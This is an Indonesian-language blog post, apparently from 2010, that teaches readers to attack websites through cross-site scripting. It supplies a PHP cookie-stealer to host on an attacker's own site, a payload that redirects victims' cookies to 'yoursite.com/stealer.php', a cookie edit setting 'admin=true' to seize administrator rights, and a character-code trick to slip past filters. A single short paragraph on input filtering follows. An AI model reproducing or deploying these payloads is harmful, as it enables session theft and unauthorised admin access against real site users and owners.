Injeksi xss ke dalam website

Ni tutor Bwt injeck sebuah website

Sebelomnya cek dolo tuh web bisa di injeksi pa ga caranya ada di step 2

Step 1

<?php

/*Ethernets Cookie Stealer */

/*Put this up on your free site */

$cookie = $_GET[‘cookie’];

$log = fopen(“xssed.txt”,”a”);

fwrite($log, $cookie .”\n”);

fclose($log);

?>

save => stealer.php

Step2

Untuk pengecekan apakah bisa di inject xss gunain javascriptnya

<script>alert(’Testing For XSS Hole’)</script>

Step selanjutnya klo misalkan tuh web bisa di inveksi cz ada alert yg muncul krn step 2 gunian ni

Step 3

<script>

window.location = ‘http://yoursite.com/stealer.php?cookie=&#8217; + document.cookie;

</script>

step 4

Nah buka xssed.txtnya deh

step 5

Cookie Manipulation:

Ni cuman contoh aja

Terkadang lo bakan melihat cookie yang terlihat seperti:

Admin=false;

Or

Logged_in=true;

Jangan binggung gunain javascriptnya

Javascript:alert(document.cookie);

Keterangan

Ini akan membuat sebuah kotak yang berisi peringatan

bahwa telah menerima. Untuk kepentingan ini demonstrasi, mari kita

katakan cookie terlihat seperti ini

Logged_in=true, admin=false, fusionid=12312313

Jadi, satu-satunya bagian yang sangat penting bagi qt adalah “admin = false”, sisanya adalah non-sense bahwa kita tidak perlu khawatir tentang. Tentunya, lo mungkin menemukan wont terlalu banyak situs web , tapi ini hanya dimaksudkan untuk memberikan dasar-dasar cara this.Obviously, kita dapat melihat bahwa jika kita ajukan ke cookie “admin = true” kita akan memiliki hak administratif. Dengan ini berikutnya sederhana JavaScript injeksi qt dapat mengubah cookienya menjadi.

Javascript:void(document.cookie=“admin=true”);

js di atas a/ hak administratif

Perlindungan:

“Jangan pernah percaya masukan pengguna dan selalu metakarakter penyaring”. Anda dapat menyaring JS atau HTML encode js. Pengalaman sebagai pengguna selalu mencoba untuk menghindari pergi ke luar adalah setiap link yang terhubung ke host lain. Hal ini dapat memecahkan 90% dari masalah terjangkitnya xss di web lo

Agar xss lo aman dr ripper bisa gunain string char code

dapat di inject degan js

/”;alert(String.fromCharCode(88,83,83))

translate=>88,83,83 =>XSS

  1. 27 January 2010 at 2:31 pm

    hey hey

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: